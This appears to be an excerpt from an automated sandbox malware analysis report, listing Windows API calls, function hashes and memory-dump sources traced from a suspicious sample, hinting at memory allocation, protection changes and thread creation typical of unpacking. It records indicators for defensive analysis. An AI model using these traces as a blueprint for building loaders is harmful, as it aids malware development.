                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: f087e510fa27ca0e112882a5aedf096370ffad36e34fcd93b5c7bc8dec0bc5b7
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: 65418A76A106129AEB1F62ACCC16BFF655AEBD0719F2CE738A303DDD82CCAC04408650
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 3dacf6a716e32880b2f2c8fc148a66958b9b90fe81c733fa190195b7b92b381a
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 80416832E546468EEB0F96A8CC753FDB359EB80309FA8D53DCB02DED91CA7845809A50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 1caffb3f836bc246d1140d4cb766d4f0849cd5edc103d1264198094d130e3d58
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: EF31AF77A106129AEB1F52ACCC16BFF655AEBE0709F2DD738A303DDD82CCAC04408550
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: 6b2774de419dfc0398beea97c5c955129ac5c4918b743b0c0010138d9305f21c
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 6F317A76A106126AEB1F22BCCC16BFF655AEBE4718F6CE739A303DDD82CDAC04408150
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 90bb5c92111daaa1e068583feac577f3158f7b5eb1038b3eaff36dc829f1c447
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: C2316E33A201029BEF0D5B64CD667FEB799E7D4319FA8953DE202EBD85DE3C48449250
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00425318: __getptd.LIBCMT ref: 0042531D
                                                                                                                            • _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 0042532A: __getptd.LIBCMT ref: 0042532A
                                                                                                                            • Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CountSleepTick_rand
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1716435427-0
                                                                                                                            • Opcode ID: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction ID: 95d9c39fcb1a92f549b40d1566920909eef1f56e4dd4b590153865105a78ff57
                                                                                                                            • Opcode Fuzzy Hash: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction Fuzzy Hash: 08F081727142146BE700AB6AF881A9E7399AFD43A4B44503AF909C7231D9759841439A
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: cc11b76cf3a5b48749084d7a74cfa6b6af898eb57b1d5f9f2eaf51b3c21d1df0
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: A441E536E10229CBEF1E9AA8C8453FF7775FBC0319F29993DC202B6991CA785944C691
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: ddd8770dcb2c152149e8fffa13c56ed7ada114ccc13b5bc30ca6efab3e321a4b
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: A0315236D11329CBDF1EDAA8C9482FFB771AB81309F29863DC20676995CB741A44C6D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: 6912853a052b99e085b54126bae8fd189e57765a6f1d8a99c71dc537eb97eba4
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: 7F318235D11329CBDF1ECAA8C9482FFB771BB81709F2A963DC20676995CA341A44C6D1
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 924edad0f454bc8cbbf6f1e644603a6fb3afcd9b35839a33e35104de16788589
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: 7E215335D11329CFDF1ECAA8C9482FFB771BB81709F2A9639C20576994CA341A44C6D1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 8878d30e9369b70146fc891733b1b81426f051f192e01eb328917cc860599f90
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 5631257AA5491266EB1F22ACCC2ABFF544AE7E4719F68EB39A303DCD82CCAD04404150
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 36a1bd077eea64965a5d0b017185de0076036134f67e3829914a57b7297f057b
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 1121F57A66491269EB1F22BCCC2ABFF544AE7E4708F68EB3DA313DCD92DC9D05805150
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00424FB3
                                                                                                                              • Part of subcall function 00424F80: GetModuleHandleW.KERNEL32(mscoree.dll,?,00424FB8,00000000,?,00424BB1,000000FF,0000001E,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000), ref: 00424F8A
                                                                                                                              • Part of subcall function 00424F80: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00424FB8,00000000,?,00424BB1,000000FF,0000001E,00000001,00000000,00000000,?,0042BB22,00000000,00000001), ref: 00424F9A
                                                                                                                            • ExitProcess.KERNEL32 ref: 00424FBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2427264223-0
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042BB6C,00000000,?,00000000,00000000,00000000,?,00427528,00000001,00000214), ref: 0042CB03
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 328603210-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 0042520F
                                                                                                                              • Part of subcall function 004250C3: __lock.LIBCMT ref: 004250D1
                                                                                                                              • Part of subcall function 004250C3: RtlDecodePointer.NTDLL(00436EC8,00000020,0042522A,00000000,00000001,00000000,?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 0042510D
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 0042511E
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(-00000004,?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425144
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425157
                                                                                                                              • Part of subcall function 004250C3: DecodePointer.KERNEL32(?,0042526A,000000FF,?,0042A4E2,00000011,00000000,?,00427493,0000000D), ref: 00425161
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3343572566-0
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,0042CCDA,0043B8B8,00000314,00000000,?,?,?,?,?,0042934B,0043B8B8,Microsoft Visual C++ Runtime Library,00012010), ref: 004273C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: 9fc23f5979f6334b29cb1758954d395bb4682e67c582c52925ce3bd9e9e1502d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: 7F01FE31D0012A9ADF2B5B74CC69FFDB675FB90708F548359DA4BE5941DB304A41DA40
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: 552ae6814b4d9df99c402c343165a308e0e6fff2beae3f43ad66ac7d71d79664
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: 3701F971D1002999EF264B30CC68FFEB635FB90708F548395DA4AE6841DB304E41DE40
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0041B2FA
                                                                                                                            • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041B30B
                                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041B316
                                                                                                                            • LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041B31F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041B337
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041B343
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B40D
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041B425
